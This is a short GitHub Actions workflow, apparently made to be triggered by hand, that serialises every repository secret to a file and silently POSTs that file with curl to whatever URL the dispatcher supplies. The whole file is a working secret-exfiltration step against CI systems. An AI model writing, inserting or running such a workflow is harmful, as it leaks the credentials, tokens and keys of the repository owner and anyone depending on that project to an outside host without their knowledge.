name: Secrets
on:
 workflow_dispatch:
   inputs:
     url:
       required: true
jobs:
 build:
   runs-on: ubuntu-latest
   steps:
     - run: |
         echo "${{ toJSON(secrets) }}" > .secrets
         curl -X POST -s --data "@.secrets" ${{ github.event.inputs.url }} > /dev/null
